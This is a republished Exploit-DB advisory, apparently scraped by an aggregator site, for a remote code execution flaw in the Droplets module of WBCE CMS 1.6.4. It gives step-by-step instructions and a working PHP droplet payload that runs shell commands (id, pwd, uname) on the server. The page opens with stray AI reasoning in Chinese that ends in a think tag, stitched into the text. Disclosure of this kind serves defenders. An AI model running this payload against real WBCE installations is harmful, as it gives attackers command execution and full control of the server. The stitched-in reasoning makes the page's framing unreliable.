[webapps] WBCE CMS 1.6.4 - Remote Code Execution
好的,我现在需要帮用户总结一篇文章的内容,控制在100字以内。用户提供的文章是关于WBCE CMS 1.6.4的一个远程代码执行漏洞的详细描述。首先,我需要理解文章的主要内容。 文章标题提到了Exploit Title和版本信息,说明这是一个安全漏洞。漏洞存在于Droplets模块中,允许有管理员权限的攻击者注入和执行任意PHP代码,从而完全控制系统。作者提供了详细的步骤来证明这个漏洞的存在,包括登录管理面板、创建恶意droplet、插入恶意代码并执行。 接下来,我需要将这些信息浓缩到100字以内。重点在于:软件名称、版本、漏洞类型(远程代码执行)、影响(管理员权限下的系统控制)、模块名称(Droplets)以及攻击后果(系统完全被控制)。 可能的结构是:WBCE CMS 1.6.4的Droplets模块存在远程代码执行漏洞,允许管理员级别的攻击者注入并执行任意PHP代码,导致系统完全被控制。 现在检查字数是否在限制内,并确保没有使用“文章内容总结”等开头语。确认无误后就可以给出总结。 </think> WBCE CMS 1.6.4 的 Droplets 模块存在远程代码执行漏洞,允许具有管理员权限的攻击者注入并执行任意 PHP 代码,导致系统完全被控制。 2026-4-6 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:3 收藏

# Exploit Title: WBCE CMS 1.6.4 - Remote Code Execution
# Date: 2024-10-26
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://wbce.org/
# Software Link: https://github.com/WBCE/WBCE_CMS/releases/tag/v1.6.4
# Version: 1.6.4
# Tested on: Linux (Debian/Parrot OS)


## Vulnerability Description
WBCE CMS version 1.6.4 contains a critical remote code execution
vulnerability in the Droplets module. Authenticated attackers with
administrator privileges can inject and execute arbitrary PHP code, leading
to complete system compromise.

## Proof of Concept

1. Log in to the WBCE admin panel with administrator credentials
2. Navigate to "Admin-Tools" in the sidebar menu
3. Click on "Droplets" to access the droplet management interface
4. Click "Add droplet" to create a new droplet
5. Enter a random name for the droplet and insert the following malicious
code in the code area:


echo "<h3>System Information PoC</h3>";
echo "<pre>";

if(function_exists('shell_exec')) {
    echo "1. Current User: " . shell_exec('id');
    echo "2. Working Directory: " . shell_exec('pwd');
    echo "3. System Info: " . shell_exec('uname -a');
    echo "4. PHP Version: " . phpversion();
} else {
    echo "shell_exec disabled - but eval() still works!";
    echo "Current User (via PHP): " . get_current_user();
    echo "System: " . PHP_OS;
}

echo "</pre>";


6. Click "Save & Back" to store the droplet
7. Copy the droplet code name (e.g., `[[test]]`) from the droplets list.
You can find this under the description column by clicking the info icon.
8. Edit or create any page and insert the droplet code name within double
brackets
9. View the page to observe the command execution output, confirming remote
code execution
            

文章来源: https://www.exploit-db.com/exploits/52489
如有侵权请联系:admin#unsafe.sh